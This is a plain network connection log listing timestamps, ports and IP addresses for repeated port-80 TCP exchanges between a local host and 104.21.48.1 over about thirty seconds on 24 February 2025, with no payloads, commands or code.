Feb 24, 2025 08:41:04.135526896 CET	80	49784	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:04.135601997 CET	49784	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:04.140029907 CET	80	49784	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:04.319190025 CET	49785	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:04.354024887 CET	80	49785	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:04.354269981 CET	49785	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:04.358089924 CET	49785	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:04.363235950 CET	80	49785	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:04.363415003 CET	49785	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:04.368607044 CET	80	49785	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:05.093513012 CET	80	49785	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:05.094177961 CET	80	49785	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:05.094384909 CET	49785	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:05.095258951 CET	49785	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:05.100604057 CET	80	49785	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:05.299580097 CET	49786	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:05.304991007 CET	80	49786	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:05.305128098 CET	49786	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:05.308188915 CET	49786	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:05.313364029 CET	80	49786	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:05.313427925 CET	49786	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:05.318470001 CET	80	49786	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.079343081 CET	80	49786	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.079372883 CET	80	49786	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.079662085 CET	49786	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.079662085 CET	49786	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.084857941 CET	80	49786	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.250737906 CET	49787	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.256171942 CET	80	49787	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.256284952 CET	49787	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.259347916 CET	49787	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.264478922 CET	80	49787	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.266860008 CET	49787	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.271991014 CET	80	49787	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.987240076 CET	80	49787	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.987400055 CET	49787	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.987442017 CET	80	49787	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:06.987546921 CET	49787	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:06.992562056 CET	80	49787	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:07.209146023 CET	49788	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:07.214263916 CET	80	49788	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:07.214390993 CET	49788	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:07.217889071 CET	49788	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:07.223052979 CET	80	49788	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:07.223129988 CET	49788	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:07.228332996 CET	80	49788	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:08.013524055 CET	80	49788	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:08.013689995 CET	49788	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:08.013895035 CET	80	49788	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:08.013952017 CET	49788	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:08.018819094 CET	80	49788	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:08.194786072 CET	49790	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:08.199914932 CET	80	49790	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:08.200002909 CET	49790	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:08.202510118 CET	49790	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:08.207591057 CET	80	49790	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:08.207648993 CET	49790	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:08.212759972 CET	80	49790	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.005796909 CET	80	49790	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.006285906 CET	49790	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.006587029 CET	80	49790	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.006913900 CET	49790	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.011425018 CET	80	49790	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.180886030 CET	49792	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.185976028 CET	80	49792	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.186150074 CET	49792	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.189316988 CET	49792	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.194494963 CET	80	49792	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.194590092 CET	49792	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.199687004 CET	80	49792	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.983505011 CET	80	49792	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.984261990 CET	80	49792	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:09.984363079 CET	49792	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.985728979 CET	49792	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:09.990773916 CET	80	49792	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:10.150949001 CET	49798	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:10.156038046 CET	80	49798	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:10.156152010 CET	49798	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:10.158746958 CET	49798	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:10.164015055 CET	80	49798	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:10.164113045 CET	49798	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:10.169434071 CET	80	49798	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:10.957798958 CET	80	49798	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:10.958010912 CET	80	49798	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:10.958410025 CET	49798	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:10.958503962 CET	49798	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:10.963926077 CET	80	49798	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:11.127759933 CET	49808	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:11.132908106 CET	80	49808	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:11.133260965 CET	49808	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:11.136051893 CET	49808	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:11.141124010 CET	80	49808	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:11.141303062 CET	49808	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:11.146382093 CET	80	49808	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:11.868144989 CET	80	49808	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:11.868230104 CET	80	49808	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:11.868340015 CET	49808	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:11.868381977 CET	49808	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:11.873447895 CET	80	49808	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.023592949 CET	49815	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.028702974 CET	80	49815	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.028781891 CET	49815	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.030726910 CET	49815	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.035845041 CET	80	49815	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.035897970 CET	49815	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.040998936 CET	80	49815	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.700562000 CET	80	49815	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.700663090 CET	49815	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.701033115 CET	80	49815	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.701082945 CET	49815	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.705687046 CET	80	49815	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.857440948 CET	49821	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.862709999 CET	80	49821	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.862818003 CET	49821	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.865015030 CET	49821	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.870152950 CET	80	49821	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:12.870311022 CET	49821	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:12.875365019 CET	80	49821	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:13.521198034 CET	80	49821	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:13.521426916 CET	49821	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:13.521891117 CET	80	49821	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:13.521945953 CET	49821	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:13.526559114 CET	80	49821	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:13.678241968 CET	49827	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:13.683731079 CET	80	49827	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:13.683958054 CET	49827	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:13.686886072 CET	49827	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:13.692408085 CET	80	49827	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:13.692579985 CET	49827	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:13.697869062 CET	80	49827	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:14.442588091 CET	80	49827	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:14.443676949 CET	80	49827	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:14.443762064 CET	49827	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:14.444103003 CET	49827	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:14.449048996 CET	80	49827	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:14.609292030 CET	49833	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:14.614442110 CET	80	49833	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:14.614546061 CET	49833	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:14.617701054 CET	49833	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:14.622751951 CET	80	49833	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:14.622816086 CET	49833	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:14.628057003 CET	80	49833	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:15.372987032 CET	80	49833	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:15.373148918 CET	49833	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:15.373459101 CET	80	49833	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:15.373537064 CET	49833	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:15.378230095 CET	80	49833	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:15.540169001 CET	49839	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:15.545182943 CET	80	49839	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:15.545258999 CET	49839	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:15.548190117 CET	49839	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:15.553215027 CET	80	49839	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:15.553276062 CET	49839	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:15.558240891 CET	80	49839	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:16.331516027 CET	80	49839	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:16.331657887 CET	49839	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:16.331921101 CET	80	49839	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:16.331979036 CET	49839	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:16.336694956 CET	80	49839	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:16.495625973 CET	49848	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:16.500674009 CET	80	49848	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:16.500896931 CET	49848	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:16.503710985 CET	49848	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:16.510318041 CET	80	49848	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:16.510554075 CET	49848	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:16.515713930 CET	80	49848	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:17.131844997 CET	80	49848	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:17.131972075 CET	49848	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:17.132817984 CET	80	49848	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:17.132987022 CET	49848	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:17.137098074 CET	80	49848	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:17.291085958 CET	49854	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:17.296248913 CET	80	49854	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:17.296313047 CET	49854	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:17.298484087 CET	49854	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:17.303448915 CET	80	49854	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:17.303495884 CET	49854	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:17.308523893 CET	80	49854	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.076884031 CET	80	49854	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.077138901 CET	49854	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.077877998 CET	80	49854	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.078265905 CET	49854	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.082165003 CET	80	49854	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.254965067 CET	49862	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.260370970 CET	80	49862	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.260492086 CET	49862	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.262248993 CET	49862	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.267342091 CET	80	49862	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.267430067 CET	49862	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.272419930 CET	80	49862	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.887789011 CET	80	49862	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.888430119 CET	80	49862	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:18.888521910 CET	49862	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.888597965 CET	49862	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:18.893594980 CET	80	49862	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:19.056919098 CET	49868	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:19.062081099 CET	80	49868	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:19.062206030 CET	49868	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:19.064204931 CET	49868	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:19.069277048 CET	80	49868	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:19.069504023 CET	49868	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:19.074603081 CET	80	49868	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:19.815033913 CET	80	49868	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:19.815155983 CET	49868	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:19.815366030 CET	80	49868	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:19.815427065 CET	49868	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:19.820189953 CET	80	49868	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.010118008 CET	49874	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.015280962 CET	80	49874	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.015451908 CET	49874	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.018351078 CET	49874	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.023401022 CET	80	49874	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.023494959 CET	49874	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.028553009 CET	80	49874	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.747927904 CET	80	49874	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.748214006 CET	49874	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.748558044 CET	80	49874	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.748652935 CET	49874	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.754259109 CET	80	49874	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.922017097 CET	49880	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.927047014 CET	80	49880	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.927153111 CET	49880	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.930866957 CET	49880	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.935830116 CET	80	49880	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:20.935903072 CET	49880	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:20.940983057 CET	80	49880	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:21.652379036 CET	80	49880	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:21.652617931 CET	49880	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:21.652776003 CET	80	49880	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:21.652837992 CET	49880	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:21.657601118 CET	80	49880	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:21.809129953 CET	49889	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:21.814291000 CET	80	49889	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:21.814412117 CET	49889	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:21.817329884 CET	49889	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:21.822345018 CET	80	49889	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:21.822434902 CET	49889	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:21.827471018 CET	80	49889	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:22.563457012 CET	80	49889	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:22.563585043 CET	49889	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:22.564115047 CET	80	49889	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:22.564182043 CET	49889	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:22.568577051 CET	80	49889	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:22.739959002 CET	49897	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:22.745131969 CET	80	49897	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:22.745232105 CET	49897	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:22.747255087 CET	49897	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:22.752284050 CET	80	49897	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:22.752346992 CET	49897	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:22.757329941 CET	80	49897	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:23.386285067 CET	80	49897	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:23.386428118 CET	49897	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:23.387931108 CET	80	49897	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:23.387981892 CET	49897	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:23.391402960 CET	80	49897	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:23.540997982 CET	49903	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:23.546077013 CET	80	49903	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:23.546166897 CET	49903	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:23.548237085 CET	49903	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:23.553260088 CET	80	49903	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:23.553323030 CET	49903	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:23.558317900 CET	80	49903	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:24.354979992 CET	80	49903	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:24.355115891 CET	49903	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:24.355755091 CET	80	49903	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:24.355811119 CET	49903	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:24.360147953 CET	80	49903	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:24.515435934 CET	49909	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:24.520596981 CET	80	49909	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:24.520685911 CET	49909	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:24.523619890 CET	49909	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:24.528676033 CET	80	49909	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:24.528728962 CET	49909	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:24.533742905 CET	80	49909	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:25.314625025 CET	80	49909	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:25.314763069 CET	49909	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:25.314975023 CET	80	49909	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:25.315036058 CET	49909	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:25.320396900 CET	80	49909	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:25.845323086 CET	49917	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:25.850488901 CET	80	49917	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:25.850562096 CET	49917	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:25.868021011 CET	49917	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:25.873107910 CET	80	49917	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:25.873163939 CET	49917	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:25.878195047 CET	80	49917	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:26.615123034 CET	80	49917	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:26.615518093 CET	80	49917	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:26.615612984 CET	49917	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:26.615717888 CET	49917	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:26.621350050 CET	80	49917	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:26.782728910 CET	49926	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:26.788350105 CET	80	49926	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:26.788485050 CET	49926	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:26.790605068 CET	49926	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:26.796201944 CET	80	49926	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:26.796281099 CET	49926	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:26.801765919 CET	80	49926	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:27.519834042 CET	80	49926	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:27.520015955 CET	49926	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:27.520711899 CET	80	49926	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:27.520787001 CET	49926	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:27.525041103 CET	80	49926	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:27.686284065 CET	49931	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:27.691468000 CET	80	49931	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:27.691546917 CET	49931	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:27.693809032 CET	49931	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:27.699393034 CET	80	49931	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:27.699453115 CET	49931	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:27.704932928 CET	80	49931	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:28.327287912 CET	80	49931	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:28.327483892 CET	49931	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:28.327677011 CET	80	49931	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:28.327728987 CET	49931	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:28.334290028 CET	80	49931	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:28.620510101 CET	49936	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:28.625612020 CET	80	49936	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:28.625715017 CET	49936	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:28.627885103 CET	49936	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:28.632910967 CET	80	49936	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:28.632961988 CET	49936	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:28.638037920 CET	80	49936	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:29.373694897 CET	80	49936	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:29.373821020 CET	49936	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:29.374133110 CET	80	49936	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:29.374274015 CET	49936	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:29.379930019 CET	80	49936	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:29.545404911 CET	49943	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:29.551479101 CET	80	49943	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:29.551862001 CET	49943	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:29.554811954 CET	49943	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:29.559880972 CET	80	49943	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:29.560064077 CET	49943	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:29.565080881 CET	80	49943	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:30.197618008 CET	80	49943	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:30.197794914 CET	49943	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:30.198227882 CET	80	49943	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:30.198297977 CET	49943	80	192.168.2.4	104.21.48.1
Feb 24, 2025 08:41:30.202799082 CET	80	49943	104.21.48.1	192.168.2.4
Feb 24, 2025 08:41:30.370299101 CET	49949	80	192.168.2.4	104.21.48.1
